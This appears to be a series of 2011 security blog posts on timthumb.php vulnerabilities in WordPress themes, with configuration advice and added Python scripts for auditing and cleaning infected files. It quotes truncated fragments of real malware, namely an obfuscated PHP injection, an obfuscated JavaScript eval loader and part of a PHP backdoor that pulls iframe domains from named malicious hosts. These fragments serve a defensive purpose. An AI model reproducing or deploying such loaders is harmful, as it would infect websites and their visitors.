Proper use and configuration of timthumb.php

With many themes using the timthumb.php and thumb.php files, we thought we should update our readers with the latest on timthumb.php.

First, make certain you have the latest:
http://timthumb.googlecode.com/svn/trunk/timthumb.php

As of this post, the current version is 2.8.9.

Open that file and look for this line to verify you have the correct version:

define ('VERSION', '2.8.9');

Scroll down a few lines and you’ll see:

if(! defined('ALLOW_EXTERNAL') ) define ('ALLOW_EXTERNAL', TRUE); // Allow image fetching from external websites. Will check against ALLOWED_SITES if ALLOW_ALL_EXTERNAL_SITES is false

This means that if the ALLOW_EXTERNAL parameter is set to TRUE, like it is here, and the parameter ALLOW_ALL_EXTERNAL_SITES is false, then timthumb.php will check the included link to see if it’s in the list of ALLOWED_SITES.

If you look at the next line down in this file you’ll see:

if(! defined('ALLOW_ALL_EXTERNAL_SITES') ) define ('ALLOW_ALL_EXTERNAL_SITES', false); // Less secure

With these 2 parameters set the way they are, timthumb.php will only show files from the list of ALLOWED_SITES. Next we need to examine the sites listed in ALLOWED_SITES.

Scroll down a few more lines and you’ll see:

// If ALLOW_EXTERNAL is true and ALLOW_ALL_EXTERNAL_SITES is false, then external images will only be fetched from these domains and their subdomains.
if(! isset($ALLOWED_SITES)){
$ALLOWED_SITES = array (
'flickr.com',
'staticflickr.com',
'picasa.com',
'img.youtube.com',
'upload.wikimedia.org',
'photobucket.com',
'imgur.com',
'imageshack.us',
'tinypic.com',
'yourdomainhere',
);
}

Now in the line where we have: ‘yourdomainhere’ you would replace that with your website domain. For us, it would be ‘wewatchyourwebsite.com’. A few things to note here. If you don’t ever expect to load images from the other sites, then delete them as well while you’re in here.

What we’ve done is to allow timthumb.php to show only files that are stored on your website or on the sites listed above. Any other domain will not be accepted and will not show. If you don’t do this, then hackers could include files from their websites and infect your website with their malicious code.

This version of timthumb.php does use a non-web folder for cache, so it is more secure, but configuring it this way adds another layer of protection to your site, and we do believe in defense in layers.
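The settings walked through above can be checked mechanically. The following audit is an added example, not code from timthumb.php or from the original post; the function names, the `example.org` domain and the embedded sample source are constructed for illustration.

```python
import re

CURRENT_VERSION = (2, 8, 9)  # current release named in the post

def _define(src, name):
    """Raw value of the first define('NAME', value) in the PHP source, or None."""
    m = re.search(r"define\s*\(\s*['\"]%s['\"]\s*,\s*([^)]+?)\s*\)" % re.escape(name), src)
    return m.group(1).strip("'\"") if m else None

def _allowed_sites(src):
    """Host names listed in the $ALLOWED_SITES = array(...) literal."""
    m = re.search(r"\$ALLOWED_SITES\s*=\s*array\s*\((.*?)\)\s*;", src, re.S)
    return re.findall(r"['\"]([^'\"]+)['\"]", m.group(1)) if m else []

def audit_timthumb(src, own_domain):
    """Return a list of findings for one timthumb.php source string."""
    findings = []
    version = _define(src, "VERSION")
    if version is None:
        findings.append("no VERSION constant found")
    elif tuple(int(n) for n in re.findall(r"\d+", version)) < CURRENT_VERSION:
        findings.append("outdated version " + version)
    external = (_define(src, "ALLOW_EXTERNAL") or "").lower() == "true"
    allow_all = (_define(src, "ALLOW_ALL_EXTERNAL_SITES") or "").lower() == "true"
    if external and allow_all:
        findings.append("ALLOW_ALL_EXTERNAL_SITES is true: ALLOWED_SITES is ignored")
    elif external:
        for site in _allowed_sites(src):
            if site == "yourdomainhere":
                findings.append("placeholder 'yourdomainhere' was never replaced")
            elif site != own_domain:
                findings.append("external host still allowed: " + site)
    return findings

# Constructed sample: the defaults quoted in the post, trimmed to two hosts.
SAMPLE_DEFAULT = """
define ('VERSION', '2.8.9');
if(! defined('ALLOW_EXTERNAL') ) define ('ALLOW_EXTERNAL', TRUE);
if(! defined('ALLOW_ALL_EXTERNAL_SITES') ) define ('ALLOW_ALL_EXTERNAL_SITES', false);
if(! isset($ALLOWED_SITES)){
    $ALLOWED_SITES = array (
        'flickr.com',
        'imgur.com',
        'yourdomainhere',
    );
}
"""

if __name__ == "__main__":
    print("\n".join(audit_timthumb(SAMPLE_DEFAULT, "example.org")))
```

An empty result means the file is at the current version and only your own domain is left in the list.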

If you have questions about this information or you’re having trouble configuring it properly for your site, please post a comment and we’ll help you.

Thank you for reading.

The latest timthumb.php infection

We’ve been seeing, over the past week, many WordPress websites infected with this line of code:

function counter_wordpress() {$_F=__FILE__;$_X='...add_action('wp_head', 'counter_wordpress');

It’s in the wp-settings.php file and it usually has a series of blank spaces before it. You’ll find it right before the legitimate line of code:

do_action( 'init' );

This needs to be removed and you need to update all of your timthumb.php and thumb.php files. Then you’ll also have to scan your websites for backdoors.

Remember that if your WordPress site is hosted in a hosting account with many other websites in the same account, the backdoor can be in all or any of the other websites. You need to scan and clean them all.
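A check for the wp-settings.php injection described above, as an added example that is not part of the original post. It matches only the two indicators quoted in the post; the sample file is constructed and its payload is replaced by a placeholder.

```python
import re

# Indicators quoted in the post; the payload between them varies and is not matched.
INJECT_RE = re.compile(
    r"function\s+counter_wordpress\s*\("
    r"|add_action\(\s*'wp_head'\s*,\s*'counter_wordpress'\s*\)")
INIT_RE = re.compile(r"do_action\(\s*'init'\s*\)")

def find_injection(text):
    """Return (line_no, leading_whitespace, next_code_is_init) per injected line."""
    lines = text.splitlines()
    hits = []
    for i, line in enumerate(lines):
        if not INJECT_RE.search(line):
            continue
        indent = len(line) - len(line.lstrip())  # padding that hides the code off-screen
        following = next((l for l in lines[i + 1:] if l.strip()), "")
        hits.append((i + 1, indent, bool(INIT_RE.search(following))))
    return hits

def remove_injection(text):
    """Drop lines that start (after whitespace) with the injected function.

    A line that carries legitimate code before the indicator is left alone
    so it can be reviewed by hand.
    """
    kept = [l for l in text.splitlines(keepends=True)
            if not l.lstrip().startswith("function counter_wordpress")]
    return "".join(kept)

# Constructed sample of an infected wp-settings.php (payload elided).
SAMPLE = (
    "<?php\n"
    "// ... earlier wp-settings.php code ...\n"
    + " " * 300 + "function counter_wordpress() {$_F=__FILE__;$_X='PAYLOAD-ELIDED';}"
    "add_action('wp_head', 'counter_wordpress');\n"
    "do_action( 'init' );\n"
)

if __name__ == "__main__":
    for line_no, indent, before_init in find_injection(SAMPLE):
        print("line %d, %d leading spaces, before do_action('init'): %s"
              % (line_no, indent, before_init))
```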

If you need help in finding and removing this, please send us an email at: support@wewatchyourwebsite.com

Thank you.

And, let’s be safe out there.

More timthumb.php infections

I don’t like making every announcement of new infections regarding timthumb.php. It feels like everyone is pointing the finger at the author, but I do have to report the recent happenings, so here goes.

The latest website infections we’ve been seeing inject obfuscated script to the bottom of .html files and the index.php file.

The code looks like:

(opening script tag)String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q)...
n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h...eval(ss);(closing script tag)

We usually see this at the very bottom of the file, typically after the closing html tag in an html file.

This code deobfuscates to an iframe that includes:

microsearchstat.com/temp/stat.php

As of this writing, Google does not find this URL suspicious, however:

What is the current listing status for microsearchstat.com?
This site is not currently listed as suspicious.

What happened when Google visited this site?
Of the 4 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-09-02, and the last time suspicious content was found on this site was on 2011-09-02.
Malicious software includes 1 trojan(s).

That is for today, September 2, 2011, which is the same day that Google reports as the last time they found suspicious content.

Again, we’ve cleaned this on WordPress sites with vulnerable timthumb.php files. These really need to be updated.

If your website is listed as having malicious or suspicious content and it’s linked to microsearchstat.com, you might want to look for the code mentioned above.
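One way to look for the appended script in .html files, as an added example that is not part of the original post. It reports any script placed after the last closing html tag and names which markers from the quoted fragment it contains; the marker names and the sample page are constructed for illustration.

```python
import re

CLOSE_HTML = re.compile(r"</html\s*>", re.I)
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
# Markers taken from the fragment quoted in the post.
MARKERS = {
    "eval": re.compile(r"\beval\s*\("),
    "string_prototype": re.compile(r"String\.prototype\.\w+\s*="),
    "numeric_array": re.compile(r"(?:\d+\s*-\s*\w+\s*,\s*){3,}"),
}

def trailing_scripts(text):
    """Return scripts located after the last closing html tag, with marker names."""
    closes = list(CLOSE_HTML.finditer(text))
    if not closes:
        return []  # no closing html tag: nothing to compare against
    tail_start = closes[-1].end()
    results = []
    for m in SCRIPT.finditer(text, tail_start):
        body = m.group(1)
        hit = sorted(name for name, rx in MARKERS.items() if rx.search(body))
        results.append({"offset": m.start(), "markers": hit})
    return results

# Constructed sample: a legitimate in-page script plus a truncated copy of the
# quoted fragment appended after the closing html tag.
SAMPLE = (
    '<html><body><script>var ok = 1;</script></body></html>\n'
    '<script>String.prototype.test="harC";var ss="";'
    'n=[7-h,7-h,103-h,100-h];eval(ss);</script>'
)

if __name__ == "__main__":
    for finding in trailing_scripts(SAMPLE):
        print(finding)
```

Any script after the closing html tag deserves a look, even when none of the markers match.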

If you need help cleaning this, please send us an email: support@wewatchyourwebsite.com or call us at (847)728-0214.

Have you spotted this on your website? Let us know…

Websites infected with googlesafebrowsing.com/kwizhveo.php

Here’s another round of infections from the timthumb.php vulnerability.

This time the hackers have registered a new domain: googlesafebrowsing.com (on August 17, 2011) and they are utilizing the timthumb.php and thumb.php files to infect websites.

In the header.php file, we’re finding code that begins with:

and continues down to:

if ( strpos ( $doms, '||' ) === false )
return false;
$domains = explode ( '||', trim ( $doms ) );
return $domains[array_rand ( $domains )];
}
?>

This is a dynamic piece of code in that it pulls a new domain from googlesafebrowsing.com/remoted.cc.txt and inserts it into an iframe that's embedded in a section of code that appears on your website. Most of the iframes have .us.to/kwizhveo.php in the URL.

You really should search your themes for any instance of timthumb.php or thumb.php and get the updated file: and replace the existing one.

What we recommend is that you use a safe FTP program like WS_FTP by Ipswitch, log in to your website and search the wp-content/themes folder for any instances of timthumb.php or thumb.php. When you find one, rename it by adding .orig to the end of it. That way, after adding the new file and testing, if your site doesn't work, you can always move back to the original (.orig) by deleting the new file and renaming the original by taking the .orig extension off.
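The same search, rename and roll-back steps as a script, for cases where you have shell access or a local copy of wp-content/themes instead of FTP. This is an added example, not part of the original post; the function names are constructed for illustration.

```python
import os
import re
import shutil
import sys

TARGETS = {"timthumb.php", "thumb.php"}
VERSION_RE = re.compile(r"define\s*\(\s*['\"]VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]")

def find_thumb_scripts(themes_dir):
    """Return sorted (path, version or None) for every timthumb.php / thumb.php."""
    found = []
    for root, _dirs, files in os.walk(themes_dir):
        for name in files:
            if name.lower() in TARGETS:
                path = os.path.join(root, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    m = VERSION_RE.search(fh.read())
                found.append((path, m.group(1) if m else None))
    return sorted(found)

def replace_with_backup(path, new_file):
    """Rename path to path.orig, then copy new_file into place. Returns the backup path."""
    backup = path + ".orig"
    if os.path.exists(backup):
        raise FileExistsError("backup already exists: " + backup)
    os.rename(path, backup)
    try:
        shutil.copyfile(new_file, path)
    except OSError:
        os.rename(backup, path)  # copy failed: put the original back
        raise
    return backup

def roll_back(path):
    """Undo replace_with_backup: delete the new file and restore path.orig."""
    backup = path + ".orig"
    if not os.path.exists(backup):
        raise FileNotFoundError(backup)
    os.remove(path)
    os.rename(backup, path)

if __name__ == "__main__" and len(sys.argv) == 3:
    themes_dir, new_file = sys.argv[1], sys.argv[2]
    for path, version in find_thumb_scripts(themes_dir):
        print(path, "version", version, "->", replace_with_backup(path, new_file))
```

Once the site is confirmed working, delete the .orig copies so the old script does not remain on the server.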

If you have the thumb.php version it's normally about 18kb in size. If you want to make that file safe without replacing it, download it to your computer and open it with an editor.

Before you make any other changes check the file for code that looks like this:
[Image: infected thumb.php file]

If you see that code, then your site is already infected and should be thoroughly cleaned. You should call us: (847)728-0214 or email: support@wewatchyourwebsite.com

However, if you don't see that code and want to modify your existing thumb.php file, scroll down to a section that looks like:

[Image: thumb file allowedSites]

Change that by deleting the websites listed: flickr.com, picasa.com, etc.

When you're finished it should look like:

[Image: modified thumb.php allowedSites]

The above steps will keep your site safe from the timthumb.php and thumb.php type of infections on your WordPress website - if you haven't had your WordPress site infected already.